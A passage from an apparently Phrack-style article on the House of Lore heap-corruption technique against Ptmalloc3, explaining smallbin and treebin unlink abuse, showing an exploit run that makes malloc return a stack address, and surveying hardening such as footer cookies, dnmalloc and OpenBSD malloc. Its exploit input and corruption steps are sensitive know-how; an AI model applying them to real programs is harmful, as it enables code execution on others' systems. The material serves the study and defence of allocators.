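            return R_ABORT_SIZE;               /* assert(size >= nb) */
        if (fwd->bk != victim || bck->fd != victim)
            return R_ABORT_LINKS;              /* neighbours must point back */
        fwd->bk = bck;
        bck->fd = fwd;
    } else {
        bin->bk = bck;                         /* bck is trusted blindly */
        bck->fd = bin;
    }
    return remainder_size(victim->size, nb) < MINSIZE ? R_EXHAUST : R_SPLIT;
}

static struct chunk bin, freed, forged;        /* constructed fixtures */

/* Build a bin holding one freed chunk whose size field is head; optionally
 * point its bk at a forged chunk, then serve one request of nb bytes. */
enum result scenario(uint32_t head, uint32_t nb, int corrupt_bk, int hardened)
{
    bin    = (struct chunk){0, 0, &freed, &freed};
    freed  = (struct chunk){0, head, &bin, corrupt_bk ? &forged : &bin};
    forged = (struct chunk){0, 0, NULL, NULL}; /* fd does not point back */
    return take_last(&bin, nb, hardened);
}

/* 1 if the bin's tail now refers to the forged chunk, i.e. the next request
 * from this bin would be served from memory the list never owned. */
int bin_poisoned(void) { return bin.bk == &forged; }

int main(void)
{
    /* nb = 1544 is the padded request for malloc(1536) in the runs above. */
    printf("size 0x41414141: remainder = %u\n",
           (unsigned)remainder_size(0x41414141u, 1544));
    printf("size 0x00000610: remainder = %u\n",
           (unsigned)remainder_size(0x610u, 1544));

    enum result r = scenario(0x610u, 1544, 1, 0);
    printf("legacy:   result = %d, bin poisoned = %d\n", r, bin_poisoned());

    r = scenario(0x610u, 1544, 1, 1);
    printf("hardened: result = %d, bin poisoned = %d\n", r, bin_poisoned());
    return 0;
}
```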



               << Insanity is doing the same
                  thing over and over again, and
                  expecting different results. >>

                                   [ Albert Einstein ]



           .-------------------------.
---[ 4 ---[   Analysis of Ptmalloc3   ]---
           .-------------------------.

Delving into the internals of Ptmalloc3, without warm up, may seem violent,
but with a little help it's only a child's game.

In order to understand correctly the next sections, I present here the most
notable differences in the code with respect to Ptmalloc2.

The basic operation remains the same, in the end it's another common memory
allocator, and is also based on a version of Doug Lea allocator but adapted
to work on multiple threads.

For example, here is the chunk definition:


struct malloc_chunk {
  size_t               prev_foot;  /* Size of previous chunk (if free).  */
  size_t               head;       /* Size and inuse bits. */
  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;
};


As we see, the names of our well known "prev_size" and "size" fields have
been changed, but the meaning remains the same. Furthermore, to the three
usual control bits we knew, an extra one called "CINUSE_BIT" has been added
which tells (in a redundant way) that the current chunk is assigned, as
opposed to PINUSE_BIT, which continues to report the allocation of the
previous chunk. Both bits have their corresponding checking and assignment
macros.

The known "malloc_state" structure now stores the bins into two different
arrays for different uses:


     mchunkptr  smallbins[(NSMALLBINS+1)*2];
     tbinptr    treebins[NTREEBINS];


The first of them stores free chunks of memory below 256 bytes. Treebins[]
is responsible for large chunks and uses a special tree organization. Both
arrays are important in the respective techniques that will be discussed in
the following sections, where more details about their management and
corruption are given.

Some of the areas of greatest interest in "malloc_state" are:

     char*      least_addr;
     mchunkptr  dv;
     size_t     magic;

 * "least_addr" is used in certain macros to check if the address of a
   given P chunk is within a reliable range.

 * "dv", or Designated Victim, is a chunk that can be used quickly to serve 
   a small request and, for efficiency, is as a general rule the last
   remaining piece of another small request. This is a value that is used
   frequently in the smallbin code, and we will see it in the next
   section.

 * "magic" is a value that should always be equal to malloc_params.magic 
   and in principle is obtained through the device "/dev/urandom". This 
   value can be XORed with mstate and written into p->prev_foot, so that
   the mstate structure of that chunk can later be retrieved by applying
   another XOR operation with the same value. If "/dev/urandom" can not be
   used, magic is calculated from the time(0) syscall and the "0x55555555U"
   value with other checkups, and if the constant INSECURE was defined at
   compile time, magic directly takes the constant value "0x58585858U".

For security purposes, some of the most important macros are the following:


#define ok_address(M, a) ((char*)(a) >= (M)->least_addr)
#define ok_next(p, n)    ((char*)(p) < (char*)(n))
#define ok_cinuse(p)     cinuse(p)
#define ok_pinuse(p)     pinuse(p)
#define ok_magic(M)      ((M)->magic == mparams.magic)


which could always return true if the constant INSECURE is defined at
compile time (which is not the case by default).


The last macro that you will see frequently is "RTCHECK(e)", which is
nothing more than a wrapper for "__builtin_expect(e, 1)", which in turn 
is more familiar from previous studies on malloc.

As we said, "malloc_params" contains some of the properties that can be
established through "mallopt(int param, int value)" at runtime, and
additionally we have the structure "mallinfo" that maintains the global
state of the allocation system with information such as the amount of 
already allocated space, the amount of free space, the number of total free
chunks, etc...

Talking about the management of Mutex and treatment of Threads in Ptmalloc3
is something beyond the scope of this article (and would probably require 
to write an entire book), so we will not discuss this issue and will rather
go forward.

In the next section we will see that all the precautions that have been
taken are not sufficient to mitigate the attack presented here.



               << Software is like entropy: It is
                  difficult to grasp, weighs nothing,
                  and obeys the Second Law of Thermodynamics:
                  i.e., it always increases. >>

                                         [ Norman Augustine ]



             .---------------------------------.
---[ 4.1 ---[   SmallBin Corruption (Reverse)   ]---
             .---------------------------------.

I set out to determine whether THoL could be viable in this latest
version by Wolfram Gloger. This version has a lot of security mechanisms
and integrity checks against heap overflows; fortunately, I discovered a
variant of our smallbin corruption method that could be applied.

To begin, we compile Ptmalloc3 and link the library statically with the
vulnerable application presented in 2.2.1. After using the same method to
exploit that application (by adjusting the evil_func( ) address of course,
which would be our dummy shellcode), we obtain a segmentation violation in
malloc.c, particularly in the last instruction of this piece of code:


----- snip -----

void* mspace_malloc(mspace msp, size_t bytes) {
  .....
  if (!PREACTION(ms)) {
    .....
    if (bytes <= MAX_SMALL_REQUEST) {
    .....
      if ((smallbits & 0x3U) != 0) {
        .....
        b = smallbin_at(ms, idx);
        p = b->fd;
        unlink_first_small_chunk(ms, b, p, idx);

----- snip -----


Ptmalloc3 can use both dlmalloc( ) and mspace_malloc( ) depending on
whether the constant "ONLY_MSPACES" has been defined at compile-time (this 
is the default option -DONLY_MSPACES). This is irrelevant for the purposes 
of this explanation since the code is practically the same for both 
functions.

The application breaks when, after having overwritten the "bk" pointer of 
buff2, one requests a new buffer with the same size. Why does it happen?

As you can see, Ptmalloc3 acts in the opposite way to Ptmalloc2. Ptmalloc2 
attempts to satisfy the memory request with the last piece in the bin; 
Ptmalloc3, however, intends to cover the request with the first piece of
the bin: "p = b->fd".

mspace_malloc () attempts to unlink this piece of the corresponding bin to 
serve the user request, but something bad happens inside the 
"unlink_first_small_chunk( )" macro, and the program segfaults.

Reviewing the code, we are interested in a few lines:


----- snip -----

#define unlink_first_small_chunk(M, B, P, I) {\
  mchunkptr F = P->fd;\                  [1]
  .....
  if (B == F)\
    clear_smallmap(M, I);\
  else if (RTCHECK(ok_address(M, F))) {\ [2]
    B->fd = F;\                          [3]
    F->bk = B;\                          [4]
  }\
  else {\
    CORRUPTION_ERROR_ACTION(M);\
  }\
}

----- snip -----


Here, P is our overwritten chunk, and B is the bin belonging to that piece.
In [1], F takes the value of the "fd" pointer that we control (at the same 
time that we overwrote the "bk" pointer in buff2).

If [2] is overcome, which is a security macro we've seen in the previous
section:


    #define ok_address(M, a) ((char*)(a) >= (M)->least_addr)


where the least_addr field is "the least address ever obtained from 
MORECORE or MMAP"... then anything of higher value will pass this test.

We arrive at the classic steps of unlink: in [3] the "fd" pointer of the 
bin points to our manipulated address. [4] is where a segmentation 
violation occurs, as it tries to write to (0x41414141)->bk the address of 
the bin. As it falls outside the allocated address space, the fun ends.

For the smallbin corruption technique over Ptmalloc3 it is necessary to 
properly overwrite the "fd" pointer of a freed buffer with a random 
address. Afterwards, it is necessary to try making a future call to
malloc( ), with the same size, that returns the random address as the
allocated space.

The precautions are the same as in 2.2.1, F->bk must contain a writable 
address, otherwise it will cause an access violation in [4].

If we accomplish all these conditions, the first chunk of the bin will be 
unlinked and the following piece of code will be triggered.


----- snip -----

        mem = chunk2mem(p);
        check_malloced_chunk(gm, mem, nb);
        goto postaction;

        .....
        postaction:
            POSTACTION(gm);
            return mem;

----- snip -----


I added the occasional printf( ) statement into mspace_malloc( ) and the 
unlink_first_small_chunk( ) macro to see what happened, and the result was 
as follows:


Starting program: /home/black/ptmalloc3/thl `perl -e 'print "A"x24 .
"\x28\xf3\xff\xbf"'` < evil.in                                                                             

[mspace_malloc()]: 16 bytes <= 244
Buff1 -> [ 0xb7feefe8 ]
[mspace_malloc()]: 128 bytes <= 244
Buff2 -> [ 0xb7fef000 ]
Buff3 -> [ 0xb7fef088 ]

Buff4 -> [ 0xb7fef190 ]

[mspace_malloc()]: 128 bytes <= 244
[unlink_first_small_chunk()]: P->fd = 0xbffff328
LB1 -> [ 0xb7fef000 ]

[mspace_malloc()]: 128 bytes <= 244
[unlink_first_small_chunk()]: P->fd = 0xbffff378
LB2 -> [ 0xbffff330 ]

Which is your favourite hobby:
This is an evil function. You become a cool hacker if you are able to
execute it


"244" is the present value of MAX_SMALL_REQUEST, which, as we can see, is 
another difference from Ptmalloc2, which used a smallbin whenever the
requested size was less than 512. In this case the range is a little more 
limited.



               << From a programmer's point of view,
                  the user is a peripheral that types
                  when you issue a read request. >>

                                      [ P. Williams ]



             .----------------------------------------.
---[ 4.2 ---[   LargeBin Method (TreeBin Corruption)   ]---
             .----------------------------------------.

At this point of the article, we have understood the basic concepts 
correctly. One could now continue to study on his own the Ptmalloc3 
internals.

In Ptmalloc3, large chunks (i.e. larger than 256 bytes) are stored in a
tree structure where each chunk has a pointer to its parent, and retains
two pointers to its children (left and right) if it has any. The code that 
defines this structure is the following:


----- snip -----

struct malloc_tree_chunk {
  /* The first four fields must be compatible with malloc_chunk */
  size_t                    prev_foot;
  size_t                    head;
  struct malloc_tree_chunk* fd;
  struct malloc_tree_chunk* bk;

  struct malloc_tree_chunk* child[2];
  struct malloc_tree_chunk* parent;
  bindex_t                  index;
};

----- snip -----


When a memory request for a large buffer is made, the
"if (bytes <= MAX_SMALL_REQUEST) {}" statement fails, and the executed
code, if nothing strange happens, is as follows:


----- snip -----

    else {
      nb = pad_request(bytes);
      if (ms->treemap != 0 && (mem = tmalloc_large(ms, nb)) != 0) {
        check_malloced_chunk(ms, mem, nb);
        goto postaction;
      }
    }

----- snip -----


Inside tmalloc_large( ), we aim to reach this code:


----- snip -----

  if (v != 0 && rsize < (size_t)(m->dvsize - nb)) {
    if (RTCHECK(ok_address(m, v))) { /* split */
      .....
      if (RTCHECK(ok_next(v, r))) {
        unlink_large_chunk(m, v);
        if (rsize < MIN_CHUNK_SIZE)
          set_inuse_and_pinuse(m, v, (rsize + nb));
        else {
          set_size_and_pinuse_of_inuse_chunk(m, v, nb);
          set_size_and_pinuse_of_free_chunk(r, rsize);
          insert_chunk(m, r, rsize);
        }
        return chunk2mem(v);
        .....

----- snip -----


If we tried to exploit this program in the same way as for Ptmalloc2, the
application would break first in the "unlink_large_chunk( )" macro, which 
is very similar to "unlink_first_small_chunk( )". The most important lines 
of this macro are these:


    F = X->fd;\ [1]
    R = X->bk;\ [2]
    F->bk = R;\ [3]
    R->fd = F;\ [4]


Thus we now know that both the "fd" and "bk" pointers of the overwritten
chunk must be pointing to writable memory addresses, otherwise this could
lead to an invalid memory access.

The next error will come in "set_size_and_pinuse_of_free_chunk(r, rsize)",
which tells us that the "size" field of the overwritten chunk must be
user-controlled. And so again, we need the vulnerable application to allow
us to introduce NULL bytes.

If we can accomplish this, the first call to "malloc(1536)" of the 
application shown in section 3 will be executed correctly, and the issue 
will come with the second call. Specifically within the loop:


----- snip -----

  while (t != 0) { /* find smallest of tree or subtree */
    size_t trem = chunksize(t) - nb;
    if (trem < rsize) {
      rsize = trem;
      v = t;
    }
    t = leftmost_child(t);
  }

----- snip -----


When you first enter this loop, "t" is equal to the address of the 
first chunk in the treebins[] entry corresponding to the size of the buffer 
requested. The loop will continue while "t" still has a child and, finally,
"v" (victim) will contain the smallest piece that can satisfy the request.

The trick to solve our problem is to exit the loop after the first 
iteration. For this, we must make "leftmost_child(t)" return a "0" 
value.

Knowing the definition:


#define leftmost_child(t) ((t)->child[0] != 0? (t)->child[0]:(t)->child[1])


The only way is to place (buff2->bk) at an address on the stack. The
child[0] and child[1] pointers there must hold a "0" value, which means 
no more children. Then "t" (and therefore "v") will be provided as long as
the "size" field does not fail the if( ) statement.



               << Before software should be
                  reusable, it should be usable. >>

                                  [ Ralph Johnson ] 



             .-----------------------------.
---[ 4.3 ---[   Implement Security Checks   ]---
             .-----------------------------.

Ptmalloc3 could be safer than it seems at first, but for this, you should
have defined the FOOTERS constant at compile time (which is not the default
case).

We saw the "magic" parameter at the beginning of section 4, which is 
present in all malloc_state structures, and the way in which it is 
calculated. The reason why "prev_size" is now named "prev_foot" is that, 
if FOOTERS is defined, this field is used to store the result of a XOR
operation between the mstate belonging to the chunk and the magic value 
calculated earlier. This is done with:


/* Set foot of inuse chunk to be xor of mstate and seed */
#define mark_inuse_foot(M,p,s)\
 (((mchunkptr)((char*)(p)+(s)))->prev_foot = ((size_t)(M) ^ mparams.magic))


XOR, as always, remains a symmetric encryption that allows, at the 
same time, saving the malloc_state address and establishing a kind of 
cookie to detect a possible attack whenever it is altered. This mstate is 
obtained with the following macro:


#define get_mstate_for(p)\
  ((mstate)(((mchunkptr)((char*)(p) +\
    (chunksize(p))))->prev_foot ^ mparams.magic))


For example, the "mspace_free( )" function, which is called by the
wrapper free( ), starts in this way:


   #if FOOTERS
       mstate fm = get_mstate_for(p);
   #else /* FOOTERS */
       mstate fm = (mstate)msp;
   #endif /* FOOTERS */
       if (!ok_magic(fm)) {
         USAGE_ERROR_ACTION(fm, p);
         return;
       }


If we corrupt the header of an allocated chunk (and therefore the prev_foot
field), then when the chunk is freed, get_mstate_for( ) will return an 
erroneous arena. At this moment ok_magic( ) will test the "magic" value of 
that area and it will abort the application.

Moreover, one must be aware that the current flow could be broken even
before the USAGE_ERROR_ACTION( ) call if the reading of fm->magic causes a 
segmentation fault due to a wrong value obtained by get_mstate_for( ).
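
The cookie round trip described above, as an added example that is not
Ptmalloc3 code: it reuses the two macros quoted in the text over a private
buffer. The fixed magic value, the helper names, and the comparison against
a single known arena before fm->magic is read (which avoids the fault
mentioned in the last paragraph) are assumptions of this model.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct mstate_s { size_t magic; };
typedef struct mstate_s *mstate;

/* In-use chunks only, so fd/bk are left out of this model. */
struct chunk { size_t prev_foot; size_t head; };
typedef struct chunk *mchunkptr;

/* Constructed constant; the real value is drawn from /dev/urandom. */
static struct { size_t magic; } mparams = { (size_t)0x5eedc0deUL };

#define INUSE_BITS   ((size_t)3)          /* PINUSE_BIT | CINUSE_BIT */
#define chunksize(p) ((p)->head & ~INUSE_BITS)
#define chunk2mem(p) ((char *)(p) + 2 * sizeof(size_t))

/* The two macros quoted in the text. */
#define mark_inuse_foot(M,p,s)\
 (((mchunkptr)((char*)(p)+(s)))->prev_foot = ((size_t)(M) ^ mparams.magic))
#define get_mstate_for(p)\
  ((mstate)(((mchunkptr)((char*)(p) +\
    (chunksize(p))))->prev_foot ^ mparams.magic))

enum { FREE_OK = 0, FREE_USAGE_ERROR = 1 };

/* Entry check of a free() built with FOOTERS. Assumption of this model:
 * the decoded pointer is compared with the one known arena before
 * fm->magic is read, so a garbage footer cannot make the check fault. */
static int footer_check(mstate known, mchunkptr p)
{
    mstate fm = get_mstate_for(p);
    if (fm != known || fm->magic != mparams.magic)
        return FREE_USAGE_ERROR;
    return FREE_OK;
}

/* Sets up one in-use chunk of 32 bytes in a private buffer, writes `extra`
 * bytes past the end of its user area (constructed out-of-bounds write),
 * and returns what the free-time check reports. */
static int run_footer_case(size_t extra)
{
    struct mstate_s arena = { mparams.magic };
    const size_t csize = 32;
    char *heap = calloc(1, 128);
    int result;

    if (heap == NULL)
        return -1;
    mchunkptr p = (mchunkptr)heap;
    p->head = csize | INUSE_BITS;
    mark_inuse_foot(&arena, p, csize);

    /* The user area ends exactly where the next chunk's prev_foot begins. */
    size_t user_len = csize - 2 * sizeof(size_t);
    memset(chunk2mem(p), 'A', user_len + extra);

    result = footer_check(&arena, p);
    free(heap);
    return result;
}

int main(void)
{
    printf("in-bounds write     -> %d\n", run_footer_case(0));
    printf("write into the foot -> %d\n", run_footer_case(sizeof(size_t)));
    return 0;
}
```

The check only runs when the chunk is passed to free( ), so it says nothing
about a chunk whose fields change after it has been released.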

How to deal with this cookie and the probability analysis in order to
predict its value at runtime is an old issue, and we will not talk more
about it here. Though one could remember the PaX case, perhaps an 
overwritten pointer can point beyond the "size" field of a chunk, and 
through a future STRxxx( ) or MEMxxx( ) call, crush its data without having
altered "prev_foot". Skape did an excellent job in his "Reducing the 
effective entropy of gs cookies" [4] for the Windows platform. It could 
give you some fantastic ideas to apply. Who knows, it all depends on the 
vulnerability and inherent requirements of the tested application.

What is the advantage of THoL with respect to this protection? It is very 
clear: the target chunk is corrupted after its release, and therefore the 
integrity checks are passed.

Anyway, there should be ways to mitigate these kinds of problems. To start,
since we all know that no memory allocation should ever belong to a 
stack location, one could implement something as simple as this:

#define STACK_ADDR 0xbff00000

/* The cast avoids comparing a pointer with an integer constant. */
#define ok_address(M, a) (((char*)(a) >= (M)->least_addr)\
                          && ((size_t)(a) <= STACK_ADDR))


and the application is aborted before a successful exploitation is
achieved. A check such as (((a) >> 20) == 0xbff) should also be effective.
It is only an example: the relative stack position could be very different
in your system, and it is a very restrictive protection.

Anyone who has read the source code has probably noticed that Ptmalloc3's
unlink...( ) macros omit the classic tests that were implanted in glibc to
check the doubly linked list. We do not consider this because we know that
a real implementation would take it into account and should add this
integrity check. However, I can not perform a more detailed study until
someone decides in the future that glibc will be based on Ptmalloc3.
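
The list test that the paragraph above says is missing, applied to the
unlink_first_small_chunk( ) steps quoted in 4.1. This is an added example,
not code from Ptmalloc3 or glibc; the function names, the four-element pool
and the "stray" chunk are assumptions, and the stale pointer is set by
plain assignment.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Same field order as the malloc_chunk shown in section 4. */
struct chunk {
    size_t prev_foot;
    size_t head;
    struct chunk *fd;
    struct chunk *bk;
};

enum { UNLINK_OK = 0, UNLINK_CORRUPT = 1 };

struct outcome { int status; int head_is_next; int head_is_stray; };

/* ok_address() as quoted in the text: a lower bound only. */
static int ok_address(uintptr_t least_addr, const void *a)
{
    return (uintptr_t)a >= least_addr;
}

/* Function form of the unlink_first_small_chunk() logic quoted in 4.1. */
static int unlink_first_unchecked(uintptr_t least, struct chunk *b,
                                  struct chunk *p)
{
    struct chunk *f = p->fd;
    if (b == f)
        return UNLINK_OK;       /* the real macro clears the smallmap bit */
    if (!ok_address(least, f))
        return UNLINK_CORRUPT;
    b->fd = f;
    f->bk = b;
    return UNLINK_OK;
}

/* Hypothetical hardened variant: the same steps plus the list test. */
static int unlink_first_checked(uintptr_t least, struct chunk *b,
                                struct chunk *p)
{
    struct chunk *f = p->fd;
    if (!ok_address(least, f))
        return UNLINK_CORRUPT;  /* never read through an out-of-range F */
    if (b->fd != p || f->bk != p)
        return UNLINK_CORRUPT;  /* both neighbours must point back at P */
    if (b == f)
        return UNLINK_OK;
    b->fd = f;
    f->bk = b;
    return UNLINK_OK;
}

/* Builds bin <-> c1 <-> c2 in a private array. With stale_fd set, c1->fd
 * is replaced (constructed state) with the address of a writable chunk
 * that was never linked into the bin. */
static struct outcome run_unlink_case(int stale_fd, int use_check)
{
    struct chunk pool[4] = {{0}};
    struct chunk *bin = &pool[0], *c1 = &pool[1];
    struct chunk *c2 = &pool[2], *stray = &pool[3];
    uintptr_t least = (uintptr_t)&pool[0];
    struct outcome o;

    bin->fd = c1;  c1->bk = bin;
    c1->fd = c2;   c2->bk = c1;
    c2->fd = bin;  bin->bk = c2;
    stray->fd = stray->bk = stray;
    if (stale_fd)
        c1->fd = stray;

    o.status = use_check ? unlink_first_checked(least, bin, c1)
                         : unlink_first_unchecked(least, bin, c1);
    o.head_is_next = (bin->fd == c2);
    o.head_is_stray = (bin->fd == stray);
    return o;
}

int main(void)
{
    struct outcome u = run_unlink_case(1, 0), c = run_unlink_case(1, 1);
    printf("unchecked: status=%d head_is_stray=%d\n", u.status, u.head_is_stray);
    printf("checked:   status=%d head_is_stray=%d\n", c.status, c.head_is_stray);
    return 0;
}
```

With the stale pointer, the unchecked form reports success and leaves the
bin head pointing at the stray chunk; the checked form reports corruption
and leaves the bin untouched.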

The conclusion of this overview is that some of the techniques detailed in
the Maleficarum & Des-Maleficarum papers are not reliable in Ptmalloc3. One
of them, for example, is The House of Force. Remember that it needs both to 
overwrite the "size" field of the wilderness chunk and a request with a 
user-defined size. This was possible partly in Ptmalloc2 because the size 
of the top chunk was read in this way:


    victim = av->top;
    size = chunksize(victim);


Unfortunately, now Ptmalloc3 saves this value in the "malloc_state" and 
reads it directly with this:


   size_t rsize = (g)m->topsize // gm for dlmalloc( ), m for 
                                // mspace_malloc( )


In any case, it is worth recalling one of the comments present at the 
beginning of "malloc.c":

     "This is only one aspect of security -- these checks do not,
      and cannot, detect all possible programming errors".



               << Programming without an overall architecture
                  or design in mind is like exploring a cave
                  with only a flashlight: You don't know where
                  you've been, you don't know where you're going,
                  and you don't know quite where you are. >>

                                                 [ Danny Thorpe ]



               .-----------------------------------.
---[ 4.3.1 ---[   Secure Heap Allocator (Utopian)   ]---
               .-----------------------------------.

First, there is no way to create a totally secure "heap allocator", it's
impossible (note: you can design the most secure allocator in the world but
if it's too slow => it's no use). To begin with, the main rule (which
is fairly obvious) is that the control structures or, more simply,
headers, can not be located adjacent to the data. Creating a macro that
adds 8 bytes to the address of a header for direct access to the data is
very simple, but has never been a safe option.

However, even if this problem is solved, some still think that
corrupting the data of another allocated chunk is not useful if it does not
allow arbitrary code execution; but what if these buffers contain data
whose integrity has to be guaranteed (financial information, others...)?

Then we come to the point at which the use of cookies between the
allocated fragments of memory becomes essential. It obviously has side
effects. The most efficient approach would be for this cookie (say 4 bytes)
to be the last 4 bytes of each allocated chunk, in order to preserve the
alignment, since putting it between two chunks would require a more
complicated and possibly slower management.

Besides this, we could also take ideas from "Electric Fence - Red-Zone
memory allocator" by Bruce Perens [5]. His protection ideas are:


   - Anti Double Frees:

	if ( slot->mode != ALLOCATED ) {
 		if ( internalUse && slot->mode == INTERNAL_USE )
			.....
		else {
			EF_Abort("free(%a): freeing free memory.",address);

   - Free unallocated space (EFense maintains an array of addresses
     of chunks allocated (slots) ):

	slot = slotForUserAddress(address);
	if ( !slot )
		EF_Abort("free(%a): address not from malloc().", address);


Other implementations of dynamic memory management that we should take into
account: Jemalloc on FreeBSD [6] and Guard Malloc for Mac OS X [7].

The first is specially designed for concurrent systems. We are talking
about management of multiple threads on multiple processors, and how to
achieve this efficiently, without affecting system performance, and getting
better times in comparison with other memory managers.

The second, to take one example, uses paging and its protection mechanism
in a very clever way. Extracted directly from the manpage, we read the core
of its method:

   "Each malloc allocation is placed on its own virtual memory page, with 
    the end of the buffer at the end of the page's memory, and the next 
    page is kept unallocated. As a result, accesses beyond the end of the 
    buffer cause a bus error immediately. When memory is freed, libgmalloc 
    deallocates its virtual memory, causing reads or writes to the freed 
    buffer cause a bus error."

Note: That's a really interesting idea but you should take into account the
fact that such a technique is not _that_ effective because it would
sacrifice a lot of memory. It would induce a PAGE_SIZE (4096 bytes is a
common value, or getpagesize( ) ;) allocation for a small chunk.

In my opinion, I do not see Guard Malloc as a memory manager of routine 
use, but rather as an implementation with which to compile your programs in
the early stages of development/debugging.

However, Guard Malloc is a highly user-configurable library. For example,
through a specific environment variable (MALLOC_ALLOW_READS) you can allow
reading past an allocated buffer. This is done by setting the following
virtual page as Read-Only. If this variable is enabled along with another
specific environment variable (MALLOC_PROTECT_BEFORE), you can read the
previous virtual page. And still more, if MALLOC_PROTECT_BEFORE is enabled
without MALLOC_ALLOW_READS, buffer underflows can be detected. But this is
something that you can read in the official documentation, and it's
needless to say more here.



               << When debugging, novices insert corrective
                  code; experts remove defective code. >>

                                         [ Richard Pattis ]



               .------------.
---[ 4.3.2 ---[   dnmalloc   ]---
               .------------.

This implementation (DistriNet malloc) [10] works like most modern 
systems, where code and data are loaded into separate memory locations:
dnmalloc applies the same idea to chunks and chunk information, which are
stored in separate contiguous memory protected by guard pages. A hash table,
which contains pointers to linked lists of chunk information accessed
through the hash function, is used to associate chunks with their chunk
information [12].

Memory with dnmalloc:

        .---------------.
        |  .text        |
        .---------------.
        |  .data        |
        .---------------.
           ...        
        .---------------.
        |  Chunks       |
        .---------------.
            ..
            ||
            ||  
            \/
        
            /\
            || 
            ||
            ..
        .--------------------.
        |  Memory Page       | <- This Page is not writable
        .--------------------. 
        |  Chunk Information |
        .--------------------.
        |  The Hash Table    |
        .--------------------. 
        |  Memory Page       | 
        .--------------------. 
        |  The Stack         | <- This Page is not writable
        .--------------------.

The way to find the chunk information:

1.- Address of the chunk - Start address of the heap = *Result*

2.- To get the entry in the Hash Table: shift *Result* 7 bits to the right.

3.- Walk the linked list until the correct chunk is found.

 .-------------------------------------.
 |           The Hash Table            |
 . ................................... . 
 |  Pointers to each Chunk Information | --> Chunk Information (Hash Next 
 .-------------------------------------.     to the next Chunk Information)

The manipulation of the Chunk Information:

1.- A fixed area is mapped below the Hash table for the Chunk Information.

2.- Free Chunk Information entries are stored in a linked list.

3.- When a new Chunk Information is needed, the first element in the free 
    list is used.

4.- If none is free, a Chunk Information is allocated from the map.

5.- If the map is empty, extra memory is mapped for it (and the guard 
    page is moved).

6.- Chunk information is protected by guard pages.
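
The lookup steps and the chunk information free list described above,
modelled in C as an added example (not dnmalloc's own code). The structure
and function names, the 4096-byte heap, the 16-entry map and the addresses
are assumptions; guard pages and growing the map are not modelled.

```c
#include <stdint.h>
#include <stdio.h>

#define HEAP_SIZE  4096u
#define HASH_SHIFT 7                      /* lookup step 2 */
#define NBUCKETS   (HEAP_SIZE >> HASH_SHIFT)
#define NINFO      16                     /* entries in the modelled map */

struct chunkinfo {
    uintptr_t chunk;              /* address of the chunk in the heap */
    size_t size;
    struct chunkinfo *hash_next;  /* bucket chain, or free list if unused */
};

struct dn_heap {
    uintptr_t heap_start;
    struct chunkinfo *table[NBUCKETS];
    struct chunkinfo map[NINFO];  /* stands in for the guarded region */
    size_t map_used;
    struct chunkinfo *free_list;
};

/* Lookup steps 1 and 2; returns -1 for an address outside the heap. */
static long bucket_of(const struct dn_heap *h, uintptr_t a)
{
    if (a < h->heap_start || a - h->heap_start >= HEAP_SIZE)
        return -1;
    return (long)((a - h->heap_start) >> HASH_SHIFT);
}

/* Lookup step 3: walk the chain until the entry for this chunk is found. */
static struct chunkinfo *dn_lookup(struct dn_heap *h, uintptr_t a)
{
    long b = bucket_of(h, a);
    struct chunkinfo *ci = b < 0 ? NULL : h->table[b];
    while (ci != NULL && ci->chunk != a)
        ci = ci->hash_next;
    return ci;
}

/* Free list first, then the map; growing the map is not modelled. */
static struct chunkinfo *ci_get(struct dn_heap *h)
{
    struct chunkinfo *ci = h->free_list;
    if (ci != NULL)
        h->free_list = ci->hash_next;
    else if (h->map_used < NINFO)
        ci = &h->map[h->map_used++];
    return ci;
}

static int dn_register(struct dn_heap *h, uintptr_t a, size_t size)
{
    long b = bucket_of(h, a);
    struct chunkinfo *ci;
    if (b < 0 || dn_lookup(h, a) != NULL || (ci = ci_get(h)) == NULL)
        return -1;
    ci->chunk = a;
    ci->size = size;
    ci->hash_next = h->table[b];
    h->table[b] = ci;
    return 0;
}

/* Returns -1 when no chunk information exists (bogus or repeated free). */
static int dn_unregister(struct dn_heap *h, uintptr_t a)
{
    long b = bucket_of(h, a);
    struct chunkinfo **pp, *ci;
    if (b < 0)
        return -1;
    for (pp = &h->table[b]; *pp != NULL; pp = &(*pp)->hash_next)
        if ((*pp)->chunk == a) {
            ci = *pp;
            *pp = ci->hash_next;
            ci->hash_next = h->free_list;
            h->free_list = ci;
            return 0;
        }
    return -1;
}

/* Constructed addresses; bit i of the result is set when check i holds. */
static unsigned run_dn_demo(void)
{
    struct dn_heap h = { .heap_start = 0x10000 };
    unsigned r = 0;
    dn_register(&h, 0x10100, 48);            /* bucket 2, uses map[0] */
    dn_register(&h, 0x10140, 32);            /* bucket 2 too, uses map[1] */
    r |= (dn_lookup(&h, 0x10140) == &h.map[1]) << 0;
    r |= (dn_lookup(&h, 0x10148) == NULL) << 1;      /* interior pointer */
    r |= (dn_unregister(&h, 0x10100) == 0) << 2;
    r |= (dn_unregister(&h, 0x10100) == -1) << 3;    /* second free */
    r |= (dn_register(&h, 0x10200, 64) == 0) << 4;
    r |= (dn_lookup(&h, 0x10200) == &h.map[0]) << 5; /* entry reused */
    return r;
}

int main(void) { printf("checks: 0x%x\n", run_dn_demo()); return 0; }
```

Because the chunk information lives apart from the chunk, a write past the
end of a buffer reaches neighbouring data but not these entries, and an
address without an entry is rejected on release.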



               << Passwords are like underwear: you don't let
                  people see it, you should change it very often,
                  and you shouldn't share it with strangers. >>

                                                [ Chris Pirillo ] 



               .------------------.
---[ 4.3.3 ---[   OpenBSD malloc   ]---
               .------------------.

This implementation [11] [13] has the following design goals: simple,
unpredictable, fast, less metadata space overhead, and robust (for example,
freeing of a bogus pointer or a double free should be detected) ... 

About the metadata: it keeps track of mmapped regions by storing their
address and size into a hash table, keeps the existing data structure for
chunk allocations, and has a free region cache with a fixed number of slots:

Free regions cache

1.- Regions freed are kept for later reuse

2.- Large regions are unmapped directly

3.- If the number of pages cached gets too large, unmap some.

4.- Randomized search for fitting region, so region reuse is less
    predictable

5.- Optionally, pages in the cache are marked PROT_NONE



               << Getting information off the Internet is
                  like taking a drink from a fire hydrant. >>

                                           [ Mitchell Kapor ]



           .-----------------------------.
---[ 5 ---[   Miscellany, ASLR and More   ]---
           .-----------------------------.

We already mentioned something about ASLR and Non Exec Heap in the Malloc
Des-Maleficarum paper. Now we do the same with the method we have studied.

For the purposes of this technique, I considered ASLR disabled in all
examples of this article. If this protection were enabled in real life,
randomization would only affect the position of the final fake chunk in the
